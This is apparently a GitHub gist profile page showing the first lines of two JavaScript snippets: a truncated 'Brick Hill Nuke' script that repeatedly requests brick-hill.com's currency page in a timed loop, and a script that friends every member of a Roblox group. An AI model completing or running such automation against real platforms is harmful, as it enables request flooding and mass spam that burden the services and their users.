Skip to content

Instantly share code, notes, and snippets.

View gtoriadotnet's full-sized avatar
👋
bye old roblox community

Graphictoria gtoriadotnet

👋
bye old roblox community
View GitHub Profile
@gtoriadotnet
gtoriadotnet / bhnuke.js
Created February 12, 2024 23:31
Brick Hill Nuke
let YOURUSERIDHERE = 33532;
let i = 0;
setInterval(function() {
fetch('https://www.brick-hill.com/currency/', {
"headers": {
"accept": "text/html",
},
"body": null,
"method": "GET",
"mode": "cors",
@gtoriadotnet
gtoriadotnet / FriendGroupPages.js
Created December 6, 2023 23:20
Friend Group Members
// XlXi
// November 2023
// Friends all members of a given group.
// Includes
const axios = require('axios');
const { awaitSync } = require('@kaciras/deasync');
// Configuration
const groupId = 1200769; // Official Group of Roblox